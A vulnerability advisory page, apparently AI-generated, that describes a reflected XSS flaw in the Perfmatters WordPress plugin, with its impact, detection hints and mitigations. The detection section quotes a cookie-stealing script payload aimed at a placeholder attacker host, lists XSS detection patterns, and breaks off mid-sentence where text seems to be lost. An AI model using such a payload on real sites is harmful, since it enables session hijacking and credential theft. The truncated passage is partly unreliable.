
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2026-56047 is an unauthenticated Reflected Cross-Site Scripting (XSS) vulnerability in the Perfmatters WordPress plugin affecting versions 2.6.3 and earlier. Disclosed on June 26, 2026, it allows remote unauthenticated attackers to inject malicious scripts into web pages viewed by other users. A patch is available, and the CVE status is listed as "Deferred." It carries a CVSS v3.1 base score of 7.1 (High) (GitHub Advisory, Patchstack).
The vulnerability is classified as CWE-79 (Improper Neutralization of Input During Web Page Generation — Cross-site Scripting), specifically a reflected XSS variant. It arises from insufficient sanitization and output encoding of user-controlled input within the Perfmatters plugin, allowing an attacker to craft a malicious URL that, when visited by an authenticated or unauthenticated user, causes arbitrary JavaScript to execute in the victim's browser. No authentication is required to craft the malicious request, though user interaction (clicking a link) is necessary for exploitation. The attack vector is network-based with low complexity (GitHub Advisory, Patchstack).
Successful exploitation enables an unauthenticated attacker to execute arbitrary JavaScript in a victim's browser within the context of the affected WordPress site, potentially leading to session hijacking, credential theft, or malware distribution. The scope is changed, meaning the injected script can affect resources beyond the vulnerable component itself. Confidentiality, integrity, and availability impacts are each rated Low, reflecting the partial but meaningful risk to affected users (GitHub Advisory).
<script>document.location='https://attacker.com/steal?c='+document.cookie</script>) embedded in the vulnerable parameter.<script>, javascript:, onerror=, or onload= in query strings directed at Perfmatters plugin endpoints./wp-content/plugins/perfmatters/) that could indicate follow-on compromise.Site administrators should upgrade the Perfmatters plugin to a version higher than 2.6.3 as the primary remediation step, as a patch is confirmed available (GitHub Advisory). As interim mitigations, implement a Content Security Policy (CSP) header to restrict unauthorized script execution, and apply a Web Application Firewall (WAF) rule to filter reflected XSS patterns in request parameters. Users should be educated to avoid clicking on unsolicited or suspicious links pointing to the WordPress site.
Wordfence included CVE-2026-56047 in their weekly WordPress vulnerability report covering June 22–28, 2026, noting it as part of a broader set of plugin vulnerabilities disclosed that week (Wordfence). Patchstack, the assigning CNA, published the vulnerability details in their database. No significant broader media coverage or notable researcher commentary beyond standard disclosure channels has been observed.
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."